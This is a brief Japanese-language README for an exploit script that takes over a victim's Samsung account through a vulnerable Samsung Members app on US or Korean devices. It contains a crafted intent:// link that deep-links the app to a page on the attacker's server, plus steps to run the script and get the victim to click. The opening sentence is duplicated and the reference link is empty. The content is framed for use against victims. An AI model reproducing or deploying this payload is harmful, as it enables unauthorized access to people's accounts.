
このスクリプトは、被害者のSamsungデバイスに特定のバージョンのSamsung Membersがインストールされており、かつ被害者のデバイスが米国または韓国地域のものである場合に、被害者のSamsungアカウントにアクセスするために使用できます。
このスクリプトは、Samsung デバイスに特定のバージョンの Samsung Members がインストールされており、被害者のデバイスが米国または韓国地域のものである場合に、被害者の Samsung アカウントにアクセスするために使用できます。
<a href="intent://launch?url=http://<attacker IP>:8000/yay.html&action=sso&from=ZZ&iso=ZZ#Intent;scheme=samsungrewards;package=com.samsung.android.voc;action=android.intent.action.VIEW;end;">yay click here yay</a>
注意: "<attacker IP>" を、このスクリプトを実行する IP アドレスに置き換えてください。
python3 ./samsung_account_access.py
Samsung 電話機を使用して、Web サーバーにブラウズし、リンクをクリックします
スクリプトに任せます
このスクリプトが悪用する問題の詳細については、こちらを参照してください: